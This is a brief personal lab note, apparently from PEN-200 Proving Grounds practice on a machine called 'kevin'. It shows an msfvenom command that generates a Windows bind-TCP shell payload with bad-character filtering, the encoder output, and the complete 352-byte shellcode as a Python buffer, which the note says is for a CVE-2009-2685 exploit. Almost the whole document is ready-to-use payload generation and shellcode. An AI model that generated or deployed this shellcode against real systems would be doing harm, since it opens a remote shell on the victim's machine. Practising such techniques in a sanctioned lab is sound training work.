InfoSec LAB

Kevin_Payload

Created: 1 min read

msfvenom

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/kevin]
└─$ msfvenom -p windows/shell_bind_tcp LHOST=$tun0 LPORT=1234 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 352 (iteration=0)
x86/call4_dword_xor chosen with final size 352
Payload size: 352 bytes
Final size of python file: 1749 bytes
buf =  b""
buf += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x39\x8c\xb9\x94\x83\xee\xfc\xe2\xf4"
buf += b"\xc5\x64\x3b\x94\x39\x8c\xd9\x1d\xdc\xbd\x79\xf0"
buf += b"\xb2\xdc\x89\x1f\x6b\x80\x32\xc6\x2d\x07\xcb\xbc"
buf += b"\x36\x3b\xf3\xb2\x08\x73\x15\xa8\x58\xf0\xbb\xb8"
buf += b"\x19\x4d\x76\x99\x38\x4b\x5b\x66\x6b\xdb\x32\xc6"
buf += b"\x29\x07\xf3\xa8\xb2\xc0\xa8\xec\xda\xc4\xb8\x45"
buf += b"\x68\x07\xe0\xb4\x38\x5f\x32\xdd\x21\x6f\x83\xdd"
buf += b"\xb2\xb8\x32\x95\xef\xbd\x46\x38\xf8\x43\xb4\x95"
buf += b"\xfe\xb4\x59\xe1\xcf\x8f\xc4\x6c\x02\xf1\x9d\xe1"
buf += b"\xdd\xd4\x32\xcc\x1d\x8d\x6a\xf2\xb2\x80\xf2\x1f"
buf += b"\x61\x90\xb8\x47\xb2\x88\x32\x95\xe9\x05\xfd\xb0"
buf += b"\x1d\xd7\xe2\xf5\x60\xd6\xe8\x6b\xd9\xd3\xe6\xce"
buf += b"\xb2\x9e\x52\x19\x64\xe4\x8a\xa6\x39\x8c\xd1\xe3"
buf += b"\x4a\xbe\xe6\xc0\x51\xc0\xce\xb2\x3e\x73\x6c\x2c"
buf += b"\xa9\x8d\xb9\x94\x10\x48\xed\xc4\x51\xa5\x39\xff"
buf += b"\x39\x73\x6c\xfe\x31\xd5\xe9\x76\xc4\xcc\xe9\xd4"
buf += b"\x69\xe4\x53\x9b\xe6\x6c\x46\x41\xae\xe4\xbb\x94"
buf += b"\x3d\x5e\x30\x72\x53\x9c\xef\xc3\x51\x4e\x62\xa3"
buf += b"\x5e\x73\x6c\xc3\x51\x3b\x50\xac\xc6\x73\x6c\xc3"
buf += b"\x51\xf8\x55\xaf\xd8\x73\x6c\xc3\xae\xe4\xcc\xfa"
buf += b"\x74\xed\x46\x41\x51\xef\xd4\xf0\x39\x05\x5a\xc3"
buf += b"\x6e\xdb\x88\x62\x53\x9e\xe0\xc2\xdb\x71\xdf\x53"
buf += b"\x7d\xa8\x85\x95\x38\x01\xfd\xb0\x29\x4a\xb9\xd0"
buf += b"\x6d\xdc\xef\xc2\x6f\xca\xef\xda\x6f\xda\xea\xc2"
buf += b"\x51\xf5\x75\xab\xbf\x73\x6c\x1d\xd9\xc2\xef\xd2"
buf += b"\xc6\xbc\xd1\x9c\xbe\x91\xd9\x6b\xec\x37\x59\x89"
buf += b"\x13\x86\xd1\x32\xac\x31\x24\x6b\xec\xb0\xbf\xe8"
buf += b"\x33\x0c\x42\x74\x4c\x89\x02\xd3\x2a\xfe\xd6\xfe"
buf += b"\x39\xdf\x46\x41"

msfvenom generate a shell code for CVE-2009-2685 exploit

Interactive Graph View

Backlinks